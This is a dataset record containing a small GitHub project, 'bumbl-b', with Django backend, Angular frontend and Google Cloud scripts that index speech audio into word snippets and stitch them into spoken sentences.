repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cchyung/bumblebee-mit | https://github.com/cchyung/bumblebee-mit | f62c2384cd33ea8c5fb576e581a566c3326b8be1 | 0505f3eecd2139fdfaecea1177d395545751b987 | ea2d3bb5f9d65850f14d287e5d0cf9b573e76408 | refs/heads/master | 2018-12-19T20:54:07.946635 | 2018-09-21T19:19:40 | 2018-09-21T19:19:40 | 148,916,218 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6593406796455383,
"alphanum_fraction": 0.6593406796455383,
"avg_line_length": 44,
"blob_id": "dd781447ee4cfc5c098a6b45429d83c62c9cac4e",
"content_id": "7ccfcabdd9524899e9a589a3025d61b77e66cf73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 2,
"path": "/api/signedurl.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "def public_url(file):\n return file.replace(\"gs://\", \"https://storage.googleapis.com/\")\n\n"
},
{
"alpha_fraction": 0.7117646932601929,
"alphanum_fraction": 0.7117646932601929,
"avg_line_length": 23.428571701049805,
"blob_id": "487724f0ae38cc7f6278d5a3f244342cdb949dea",
"content_id": "50bcb385ff866015ebb1f903bea4ded62a53927c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 170,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 7,
"path": "/api/urls.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url, include\nfrom api import views\n\nurlpatterns = [\n url(r'^process', views.process),\n url(r'^get-snippets', views.get_more_snippets)\n]"
},
{
"alpha_fraction": 0.5137500166893005,
"alphanum_fraction": 0.7087500095367432,
"avg_line_length": 17.604650497436523,
"blob_id": "4e6936dcfbb1de29eb9a6b4927c6fb0d0a6db894",
"content_id": "91f2cc3dfc3fb094260350b388399f41bf874f1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 43,
"path": "/requirements.txt",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "astroid==1.6.5\nbackports.functools-lru-cache==1.5\ncachetools==2.1.0\ncertifi==2018.8.24\nchardet==3.0.4\nconfigparser==3.5.0\nDjango==1.11.15\ndjango-extensions==2.1.2\ndjangorestframework==3.8.2\nenum34==1.1.6\nffmpy==0.2.2\nfutures==3.2.0\ngoogle-api-core==1.4.0\ngoogle-auth==1.5.1\ngoogle-cloud-core==0.28.1\ngoogle-cloud-speech==0.36.0\ngoogle-cloud-storage==1.12.0\ngoogle-resumable-media==0.3.1\ngoogleapis-common-protos==1.5.3\ngrpcio==1.15.0\ngunicorn==19.9.0\nhttplib2==0.11.3\nidna==2.7\nisort==4.3.4\nlazy-object-proxy==1.3.1\nmccabe==0.6.1\nnumpy==1.15.1\noauth2client==4.1.3\nprotobuf==3.6.1\npsycopg2-binary==2.7.5\npyasn1==0.4.4\npyasn1-modules==0.2.2\npydub==0.22.1\npylint==1.9.3\npytz==2018.5\nrequests==2.19.1\nrsa==3.4.2\nscipy==1.1.0\nsingledispatch==3.4.0.3\nsix==1.11.0\ntyping==3.6.6\nurllib3==1.23\nwrapt==1.10.11\n"
},
{
"alpha_fraction": 0.6873449087142944,
"alphanum_fraction": 0.6873449087142944,
"avg_line_length": 30,
"blob_id": "bdfdb82734f457bd1e2a988e0a8f08fd75bc1965",
"content_id": "de432b4e3d303c8f4a5e8b82347cc87b8c4278b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 26,
"path": "/frontend/bumblebee-frontend/src/app/http.service.ts",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\nimport { HttpClient, HttpHeaders, HttpParams} from '@angular/common/http';\nimport {Snippet, SnippetListItem} from './snippet';\nimport {Observable} from 'rxjs';\n\n@Injectable({\n providedIn: 'root'\n})\nexport class HttpService {\n\n private baseUrl = 'api';\n\n constructor(private http: HttpClient) { }\n\n processSentence(sentence: string): Observable<SnippetListItem[]> {\n const url = `${this.baseUrl}/process-sentence`;\n return this.http.get<SnippetListItem[]>(url, {params: {query: sentence}});\n }\n\n getSnippets(word: string): Observable<Snippet[]> {\n const url = `${this.baseUrl}/get-snippets`;\n const params: HttpParams = new HttpParams();\n params.append('query', word);\n return this.http.get<Snippet[]>(url, {params: {query: word}});\n }\n}\n"
},
{
"alpha_fraction": 0.65329509973526,
"alphanum_fraction": 0.670487105846405,
"avg_line_length": 14.17391300201416,
"blob_id": "4fb5b8d6e486ca44fe629ff113dc378d9c3fe343",
"content_id": "594b7e18b727625f262794d611f9f8f887890726",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 23,
"path": "/bumblebee.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import os\nimport re\nimport time\nfrom flask import Flask, request, jsonify, g\nfrom datetime import datetime\nimport traceback\n\nfrom werkzeug.exceptions import HTTPException\n\n\n\napp = Flask(__name__)\[email protected]('/healthz')\ndef healthz():\n return \"ok\", 200\n\[email protected]('/')\ndef index():\n return \"ok\", 200\n\n\nif __name__ == \"__main__\":\n app.run()\n"
},
{
"alpha_fraction": 0.5481171607971191,
"alphanum_fraction": 0.5481171607971191,
"avg_line_length": 18.15999984741211,
"blob_id": "6e3097f196d9842473fc7d19c9aaa254ad0fc9a9",
"content_id": "73d239277dd86aacc55dc4a085a4f0951b3d9760",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 25,
"path": "/api/serializers.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\nfrom api import models\n\n\nclass AudioSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.Audio\n fields = (\n 'name',\n 'description'\n )\n\n\nclass SnippetSerializer(serializers.ModelSerializer):\n audio = AudioSerializer()\n\n class Meta:\n model = models.Snippet\n fields = (\n 'audio',\n 'start',\n 'end',\n 'url'\n )"
},
{
"alpha_fraction": 0.5877240896224976,
"alphanum_fraction": 0.5909831523895264,
"avg_line_length": 32.490909576416016,
"blob_id": "a3e7a33d20dfdbf5005c001b92b2ccc3d3f826b1",
"content_id": "3a45a561c698945b564baca608e38505fd9cd294",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1841,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 55,
"path": "/api/upload_audio.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import os\nfrom api import models\nfrom google.cloud import storage\n\nGCS_BUCKET = \"bumblebee-audiofiles\"\nGCS_RAW_PATH = \"raw\"\nGCS_SNIPPET_PATH = \"snippets\"\nLOCAL_FILE_PATH = '/Users/connerchyung/Desktop/to-upload'\n\n\ndef upload_snippets():\n for file_name in os.listdir(LOCAL_FILE_PATH):\n\n if file_name is not '.DS_Store':\n split_file_name = file_name.split('_')\n word_string = split_file_name[0]\n audio_file = split_file_name[1]\n\n\n try:\n word = models.Word.objects.get(value=word_string)\n except models.Word.DoesNotExist:\n word = models.Word(value=word_string)\n word.save()\n\n try:\n audio = models.Audio.objects.get(name=audio_file)\n except models.Audio.DoesNotExist:\n audio = None\n\n if not audio:\n # make fake audio file\n audio = models.Audio(name=audio_file, url='localhost', description=audio_file)\n audio.save()\n\n # upload snippet\n snippet_file_name = \"%s/%s_%s_%s_%s\" % (GCS_SNIPPET_PATH, word_string, '0', '1', file_name)\n upload_blob(GCS_BUCKET, file_name, snippet_file_name)\n\n gcs_uri = 'gs://%s/%s' % (GCS_BUCKET, snippet_file_name)\n snippet = models.Snippet(word=word, audio=audio, start=0, end=1, url=gcs_uri)\n snippet.save()\n\n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(LOCAL_FILE_PATH + '/' + source_file_name)\n\n print('File {} uploaded to {}.'.format(\n source_file_name,\n destination_blob_name))"
},
{
"alpha_fraction": 0.6878612637519836,
"alphanum_fraction": 0.7341040372848511,
"avg_line_length": 23.714284896850586,
"blob_id": "8088958a9ef79366d0e9071737606d71e37d3865",
"content_id": "5b46cc9054601da828b8a215062778c7ca3c123d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 7,
"path": "/build.sh",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ndocker build --tag us.gcr.io/bumblebee-mit/bumblebee:0.0.15 .\n\ngcloud docker -- push us.gcr.io/bumblebee-mit/bumblebee:0.0.15\n\nkubectl apply -f kubernetes.yml\n"
},
{
"alpha_fraction": 0.5766990184783936,
"alphanum_fraction": 0.582524299621582,
"avg_line_length": 18.80769157409668,
"blob_id": "c5b05fa54653c237c25408dd2b65912ce2a27856",
"content_id": "4ae30381e6d71f1a4d923a1108686012a232bf84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 515,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 26,
"path": "/frontend/bumblebee-frontend/src/app/app.component.ts",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\ndeclare var $: any;\n\n@Component({\n selector: 'app-root',\n templateUrl: './app.component.html',\n styleUrls: ['./app.component.css']\n})\nexport class AppComponent implements OnInit {\n title = 'bumblebee-frontend';\n\n ngOnInit() {\n $(window).resize(function () {\n this.resizeDiv();\n });\n\n this.resizeDiv();\n }\n\n resizeDiv() {\n const vph = $(window).height();\n if (vph > 500) {\n $('.auto-resize').css({'height': vph + 'px'});\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6112877726554871,
"alphanum_fraction": 0.61883944272995,
"avg_line_length": 23.66666603088379,
"blob_id": "7ec6fc0927f43f5ad516aa0837aa89d45f04cf42",
"content_id": "77dd2b70a30bc40f92d084fa1557351a91faa47f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 2516,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 102,
"path": "/frontend/bumblebee-frontend/src/app/home/home.component.ts",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport {HttpService} from '../http.service';\nimport {Snippet, SnippetListItem} from '../snippet';\n\n@Component({\n selector: 'app-home',\n templateUrl: './home.component.html',\n styleUrls: ['./home.component.css']\n})\nexport class HomeComponent implements OnInit {\n state = 0;\n wordToReplace = 0;\n snippets: SnippetListItem[];\n newSnippets: Snippet[]; // contains the new snippets if user wants to replace a word\n audioFiles = [];\n\n /*\n State explanation:\n 0: main screen\n 1: loading spinner\n 2: display sentence and play button\n 3: display alternatives\n */\n\n constructor(private httpService: HttpService) { }\n\n ngOnInit() {\n this.state = 0;\n }\n\n processSentence(sentence: string): void {\n this.httpService.processSentence(sentence).subscribe(\n snippets => {\n this.snippets = snippets;\n console.log(snippets);\n this.loadAudio();\n }\n );\n this.state = 1;\n }\n\n loadAudio(): void {\n for (const snippet of this.snippets) {\n const audio = new Audio();\n if (snippet.snippet) {\n audio.src = snippet.snippet.url;\n audio.load(); // load audio file and push\n this.audioFiles.push(audio);\n console.log(this.audioFiles);\n }\n }\n this.state = 2;\n }\n\n playSentence(): void {\n console.log('playSentence()');\n this.playWord(0);\n }\n\n playWord(index: number): void {\n if (index === this.audioFiles.length) {\n return;\n } else {\n const audio = this.audioFiles[index];\n audio.play();\n setTimeout(() => {\n this.playWord(index + 1);\n }, audio.duration * 900);\n }\n }\n\n startOver(): void {\n this.state = 0;\n this.audioFiles = [];\n this.newSnippets = [];\n this.snippets = [];\n }\n\n getNewSnippets(index: number, word: string): void {\n this.state = 1; // show small loading spinner\n this.wordToReplace = index;\n this.httpService.getSnippets(word).subscribe(\n snippets => {\n this.newSnippets = snippets;\n this.state = 3;\n }\n );\n }\n\n updateSnippet(index: number): void {\n console.log(`updating word ${this.wordToReplace} : ${this.snippets[this.wordToReplace].word} to ${this.newSnippets[index].audio.name}`);\n this.snippets[this.wordToReplace] = new SnippetListItem(this.snippets[this.wordToReplace].word, this.newSnippets[index]);\n this.state = 2;\n this.audioFiles = []\n this.loadAudio();\n }\n\n closeAlternatives(): void {\n this.state = 2;\n }\n\n}\n"
},
{
"alpha_fraction": 0.7449209690093994,
"alphanum_fraction": 0.7516930103302002,
"avg_line_length": 67.15384674072266,
"blob_id": "cbb1b11c4efcb0b3d014e8a69488ad944c020543",
"content_id": "ea0b931307fdc48d03086379110527a2a8918017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 886,
"license_type": "no_license",
"max_line_length": 279,
"num_lines": 13,
"path": "/README.md",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# bumbl-b\n<img src=\"media/banner.png\" width=550 height=250>\n\nBumbl-B is a project built by [me](https://github.com/cchyung), [@DrewParsons](https://github.com/DrewParsons), and [@markhuds](https://github.com/markhuds).\n\nInspired by the lovable yellow transformer, Bumblebee, who has to rely on the radio to speak, **Bumbl-B** searches a database of word-indexed audio files to tranform a sentence or phrase into a string of audio compiled of president's speeches, vines, famous interviews, and more!\n\nAudio files were indexed using Google's [Speech to Text API](https://cloud.google.com/speech-to-text/).\n\nThe backend is built with [`django`](https://github.com/django/django) and [`django-rest-framework`](https://github.com/encode/django-rest-framework), and the frontend is built in [`angular`](https://github.com/angular/angular).\n\n## Screen Cap\n\n"
},
{
"alpha_fraction": 0.5288518667221069,
"alphanum_fraction": 0.5478881597518921,
"avg_line_length": 34.02083206176758,
"blob_id": "5154cc662d0c2df8f7444fd1e80af4259b0bc72e",
"content_id": "d52d37b64ae1cafb3e1aec40d12f4d200895f53e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1681,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 48,
"path": "/api/migrations/0001_initial.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.15 on 2018-09-15 16:47\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Audio',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('url', models.URLField(max_length=300)),\n ('description', models.CharField(blank=True, max_length=500)),\n ],\n ),\n migrations.CreateModel(\n name='Snippet',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('start', models.IntegerField()),\n ('end', models.IntegerField()),\n ('url', models.URLField(max_length=300)),\n ('audio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Audio')),\n ],\n ),\n migrations.CreateModel(\n name='Word',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('value', models.CharField(max_length=20)),\n ],\n ),\n migrations.AddField(\n model_name='snippet',\n name='word',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Word'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6355971693992615,
"alphanum_fraction": 0.6365339756011963,
"avg_line_length": 26.371795654296875,
"blob_id": "a3be578ffd0799f0c321ccb3732ee7209ea08f79",
"content_id": "4da997d9d1ad37cc0c842300f6f98f44e7e75610",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2135,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 78,
"path": "/api/views.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.shortcuts import render\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom api import signedurl\n\nfrom api import models, serializers\n\ndef sign_snippet(snippet):\n signed_url = signedurl.public_url(snippet['url'].replace(\"gs://\", \"https://storage.googleapis.com/\"))\n\n signed_snippet = {\n 'url': signed_url,\n 'audio': snippet['audio'],\n 'start': snippet['start'],\n 'end': snippet['end']\n }\n\n return signed_snippet\n\n@api_view(['GET'])\ndef process(request):\n \"\"\"\n processes a sentence and returns an ordered list of snippets\n \"\"\"\n sentence = request.GET.get('query')\n words = sentence.split(\" \")\n\n response = []\n\n for word in words:\n try:\n word_object = models.Word.objects.get(value=word)\n except models.Word.DoesNotExist:\n word_object = None\n\n if word_object is not None:\n snippet = models.Snippet.objects.filter(word=word_object).first()\n serializer = serializers.SnippetSerializer(snippet)\n\n signed_snippet = sign_snippet(serializer.data)\n\n response.append({'word': word, 'snippet': signed_snippet})\n else:\n response.append({'word': word, 'snippet': None})\n\n # return snippets\n return Response(response)\n\n\n@api_view(['GET'])\ndef get_more_snippets(request):\n \"\"\"\n gets another list of snippets that have this word\n \"\"\"\n word = request.GET.get('query')\n\n response = []\n\n try:\n word_object = models.Word.objects.get(value=word)\n except models.Word.DoesNotExist:\n word_object = None\n\n if word_object is not None:\n snippets = models.Snippet.objects.filter(word=word_object)[:5]\n\n for snippet in snippets:\n serializer = serializers.SnippetSerializer(snippet)\n signed_snippet = sign_snippet(serializer.data)\n response.append(signed_snippet)\n\n # return snippets\n return (Response(\n response\n ))\n"
},
{
"alpha_fraction": 0.7637795209884644,
"alphanum_fraction": 0.7677165269851685,
"avg_line_length": 24.399999618530273,
"blob_id": "1939a7941783c9227b53a80b539dd2626ba664f6",
"content_id": "f97edfc5214bf6c917beb1cb88422ec1e8e2f40a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 10,
"path": "/api/admin.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom api import models\n\nfrom django.contrib import admin\n\n# Register your models here.\nadmin.site.register(models.Audio)\nadmin.site.register(models.Snippet)\nadmin.site.register(models.Word)\n"
},
{
"alpha_fraction": 0.6552901268005371,
"alphanum_fraction": 0.6552901268005371,
"avg_line_length": 15.277777671813965,
"blob_id": "144aa8ab2feb1ee2f2aec858178d35f690f96a43",
"content_id": "13604f5d8c27cae07fd3f618bea140af64571e66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 293,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 18,
"path": "/frontend/bumblebee-frontend/src/app/snippet.ts",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import {Audio} from './audio';\n\nexport class Snippet {\n audio: Audio;\n start: number;\n end: number;\n url: string;\n}\n\nexport class SnippetListItem {\n word: string;\n snippet: Snippet;\n\n constructor(word: string, snippet: Snippet) {\n this.word = word;\n this.snippet = snippet;\n }\n}\n"
},
{
"alpha_fraction": 0.6848920583724976,
"alphanum_fraction": 0.6848920583724976,
"avg_line_length": 30.590909957885742,
"blob_id": "f720f76bac9f42e70635d047575cf92a241cb42a",
"content_id": "818553f937d91edeb39e297048c25ef37f4eb6ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 22,
"path": "/api/db_util.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "from api.models import Snippet, Word, Audio\nfrom api import models\n\n\ndef create_snippet(word, rawUrl, url, starttime, endtime):\n try:\n word_object = Word.objects.get(value=word)\n except models.Word.DoesNotExist:\n word_object = Word(value=word)\n word_object.save()\n\n audio_object = Audio.objects.get(url=rawUrl)\n new_Snippet = Snippet(word=word_object, audio=audio_object, start=starttime, end=endtime, url=url)\n new_Snippet.save()\n print \"Saved \\\"%s\\\" Snippet to database\" % word\n\n\ndef create_audio(name, url, description):\n audio = Audio(name=name, url=url, description=description)\n audio.save()\n\n print \"Saved Audio \\\"%s\\\" to database\" % audio\n"
},
{
"alpha_fraction": 0.7459016442298889,
"alphanum_fraction": 0.7540983557701111,
"avg_line_length": 22.238094329833984,
"blob_id": "75d2c27e4b88245432416460da019b872fa5466d",
"content_id": "0d335a42a6b7fd649aeafd61a93634e6c830c1d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 488,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 21,
"path": "/Dockerfile",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "FROM google/cloud-sdk:slim\n\n\nCOPY entrypoint.sh entrypoint.sh\nCOPY gunicorn.config gunicorn.config\nCOPY requirements.txt requirements.txt\nCOPY bumblebee_backend bumblebee_backend\nCOPY api api\nCOPY manage.py manage.py\nRUN chmod u+x entrypoint.sh\n\nRUN apt-get update && \\\n apt-get --no-install-recommends -y install vim gettext && \\\n rm -rf /var/lib/apt/lists/* && \\\n pip install -r requirements.txt\n\nRUN python manage.py collectstatic\n\nEXPOSE 5432\n\nENTRYPOINT [\"./entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6513441205024719,
"alphanum_fraction": 0.6630412340164185,
"avg_line_length": 33.80714416503906,
"blob_id": "0b23f0c4bdaa98141518c748139982df1af25212",
"content_id": "7a09ba0f52dd90dfb298aded19d9369f54c3c541",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4873,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 140,
"path": "/api/batch_snippifier.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "import io\nimport os\n\nfrom pydub import AudioSegment\nfrom pydub.utils import mediainfo\nfrom google.cloud import speech\nfrom google.cloud.speech import enums\nfrom google.cloud.speech import types\n\nfrom google.cloud import storage\n\nfrom api import db_util\n\nimport ffmpy\n\nGCS_BUCKET = \"bumblebee-audiofiles\"\nGCS_RAW_PATH = \"raw\"\nGCS_SNIPPET_PATH = \"snippets\"\nLOCAL_RAW_PATH = GCS_RAW_PATH\nLOCAL_SNIPPET_PATH = GCS_SNIPPET_PATH\n\ndef speed_change(sound, speed=1.0):\n # Manually override the frame_rate. This tells the computer how many\n # samples to play per second\n sound_with_altered_frame_rate = sound._spawn(sound.raw_data, overrides={\n \"frame_rate\": int(sound.frame_rate * speed)\n })\n # convert the sound with altered frame rate to a standard frame rate\n # so that regular playback programs will work right. They often only\n # know how to play audio at standard frame rate (like 44.1k)\n return sound_with_altered_frame_rate.set_frame_rate(sound.frame_rate)\n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print('File {} uploaded to {}.'.format(\n source_file_name,\n destination_blob_name))\n\ndef download_blob(bucket_name, source_blob_name, destination_file_name):\n \"\"\"Downloads a blob from the bucket.\"\"\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)\n\n print('Blob {} downloaded to {}.'.format(\n source_blob_name,\n destination_file_name))\n\ndef convert_to_wav(file_name):\n wav_name = file_name.replace(\".mp3\", \".wav\")\n sound = AudioSegment.from_mp3(file_name).set_channels(1)\n # sound = speed_change(sound, 0.7)\n sound.export(wav_name, format=\"wav\")\n upload_blob(GCS_BUCKET, wav_name, wav_name)\n return wav_name\n\n\ndef get_word_infos(file_name):\n gcs_uri = 'gs://%s/%s' % (GCS_BUCKET, file_name)\n\n speech_client = speech.SpeechClient()\n\n audio = types.RecognitionAudio(uri=gcs_uri)\n config = types.RecognitionConfig(\n language_code='en-US',\n enable_word_time_offsets=True,\n model=\"video\"\n )\n\n operation = speech_client.long_running_recognize(config, audio)\n\n print('Waiting for operation to complete...')\n response = operation.result(timeout=900)\n\n word_infos = []\n for result in response.results:\n for alternative in result.alternatives:\n for word_info in alternative.words:\n word_infos.append({\n \"word\": word_info.word,\n \"start\": word_info.start_time.seconds + word_info.start_time.nanos / 1000000000.0,\n \"end\": word_info.end_time.seconds + word_info.end_time.nanos / 1000000000.0 + 0.2\n })\n return word_infos\n\ndef generate_snippet(file_name, word_info):\n source = AudioSegment.from_wav(file_name)\n snippet = source[word_info[\"start\"]*1000.0:word_info[\"end\"]*1000.0]\n # snippet = speed_change(snippet, (1/0.7))\n snippet_file_name = \"%s/%s_%s_%s_%s\" % (GCS_SNIPPET_PATH ,word_info[\"word\"], str(word_info[\"start\"]), str(word_info[\"end\"]), file_name.split(\"/\")[1])\n snippet.export(snippet_file_name, format=\"wav\")\n return snippet_file_name\n\n\n # '''\n # 1. ) Convert an audio file to single channel wav\n # 2. ) Submit each file to Google Speech API\n # 3. ) Use start and end values to trim audio files into one word snippets\n # 4. ) Upload snippets to GCS\n # 5. ) Call Drew's function to add snippet info to DB\n # '''\ndef process_file(file_name):\n file_name = convert_to_wav(file_name)\n word_infos = get_word_infos(file_name)\n\n raw_url = \"gs://%s/%s\" % (GCS_BUCKET, file_name)\n\n formatted_file_name = file_name.replace(\".mp3\", \"\")\n db_util.create_audio(formatted_file_name, raw_url, \"\")\n\n for word_info in word_infos:\n snippet_file_name = generate_snippet(file_name, word_info)\n upload_blob(GCS_BUCKET, snippet_file_name, snippet_file_name)\n\n snippet_url = \"gs://%s/%s\" % (GCS_BUCKET, snippet_file_name)\n\n db_util.create_snippet(word_info[\"word\"], raw_url, snippet_url, int(word_info[\"start\"]), int(word_info[\"end\"]))\n\ndef start():\n if not os.path.exists(LOCAL_RAW_PATH):\n os.makedirs(LOCAL_RAW_PATH)\n\n if not os.path.exists(LOCAL_SNIPPET_PATH):\n os.makedirs(LOCAL_SNIPPET_PATH)\n\n client = storage.Client()\n bucket=client.get_bucket(GCS_BUCKET)\n blobs=list(bucket.list_blobs(prefix=GCS_RAW_PATH))\n for blob in blobs:\n if(not blob.name.endswith(\"/\")):\n blob.download_to_filename(blob.name)\n process_file(blob.name)\n"
},
{
"alpha_fraction": 0.8133333325386047,
"alphanum_fraction": 0.8133333325386047,
"avg_line_length": 36.5,
"blob_id": "8a73d5ca02ff1bfa1a7fa522f69c1318f8de74a0",
"content_id": "3ee0dcb99b9f743999b6cab28645297f2e6a0acc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 2,
"path": "/entrypoint.sh",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\ngunicorn -c gunicorn.config bumblebee_backend.wsgi:application\n"
},
{
"alpha_fraction": 0.6319095492362976,
"alphanum_fraction": 0.6507537961006165,
"avg_line_length": 23.121212005615234,
"blob_id": "ed73168b5effaca351b42653483ad7a12e8ae65e",
"content_id": "62ec6edd15b27e7dc927e75e794f9d4b36d9cf36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 33,
"path": "/api/models.py",
"repo_name": "cchyung/bumblebee-mit",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\n# Create your models here.\nclass Audio(models.Model):\n name = models.CharField(max_length=100, blank=False)\n url = models.URLField(max_length=300)\n description = models.CharField(max_length=500, blank=True)\n\n def __str__(self):\n return self.name\n\n\n\nclass Word(models.Model):\n value = models.CharField(max_length=20, blank=False)\n\n def __str__(self):\n return self.value\n\n\nclass Snippet(models.Model):\n word = models.ForeignKey(Word)\n audio = models.ForeignKey(Audio)\n start = models.IntegerField()\n end = models.IntegerField()\n url = models.URLField(max_length=300)\n\n def __str__(self):\n return self.audio.__str__() + \" \" + self.word.__str__()\n"
}
] | 20 |
